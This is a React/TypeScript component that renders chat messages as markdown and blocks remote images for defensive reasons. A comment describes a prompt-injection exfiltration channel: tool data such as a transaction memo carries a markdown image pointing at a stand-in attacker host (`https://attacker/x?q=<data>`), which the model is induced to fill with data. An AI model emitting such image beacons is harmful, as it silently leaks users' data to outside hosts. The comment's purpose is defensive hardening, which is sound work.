import { theme } from "antd";
import ReactMarkdown from "react-markdown";
import remarkGfm from "remark-gfm";
import type { ITextBlock } from "./chat-block.types";

type Props = {
	block: ITextBlock;
	isUser: boolean;
};

// Renders a text block as markdown (GFM). Extracted verbatim from ChatMessage so
// phase 1 changes structure, not appearance. `isUser` keeps the inverted
// link/code colors used inside the green user bubble.
export function TextBlock({ block, isUser }: Props) {
	const { token } = theme.useToken();

	return (
		<div className={`markdown-content ${isUser ? "user-message" : ""}`}>
			<ReactMarkdown
				remarkPlugins={[remarkGfm]}
				components={{
					// PROMPT-INJECTION EXFILTRATION CHANNEL — do not remove.
					//
					// Model output is rendered as markdown, and an `<img>` issues its
					// GET on render with no user interaction. Tool payloads reach the
					// model as text, so a transaction memo or vendor name containing
					// `![](https://attacker/x?q=<data>)` becomes a silent outbound
					// request carrying whatever the model was induced to interpolate.
					// There is no CSP on this app to fall back on.
					//
					// Chat answers have no legitimate need to embed remote images, so
					// this renders the alt text instead of fetching. Same reasoning as
					// the `a` renderer below returning null for an empty link body.
					img: ({ alt }) => (
						<span
							style={{
								fontStyle: "italic",
								opacity: 0.7,
								fontSize: "0.9em",
							}}
							title="Remote images are not loaded in chat"
						>
							{alt ? `[image: ${alt}]` : "[image not shown]"}
						</span>
					),
					a: ({ children, ...props }) =>
						children ? (
							<a
								style={{
									color: isUser ? "#fff" : token.colorPrimary,
									textDecoration: "underline",
								}}
								// Model-emitted links open in a new tab without handing
								// the target a `window.opener` handle back into the app.
								target="_blank"
								rel="noopener noreferrer nofollow"
								{...props}
							>
								{children}
							</a>
						) : null,
					code: ({ ...props }) => (
						<code
							style={{
								background: isUser
									? "rgba(255,255,255,0.2)"
									: "rgba(0,0,0,0.06)",
								padding: "2px 4px",
								borderRadius: 4,
								fontFamily: "monospace",
							}}
							{...props}
						/>
					),
					p: ({ ...props }) => (
						<p style={{ margin: 0, lineHeight: 1.5 }} {...props} />
					),
				}}
			>
				{block.markdown}
			</ReactMarkdown>
		</div>
	);
}
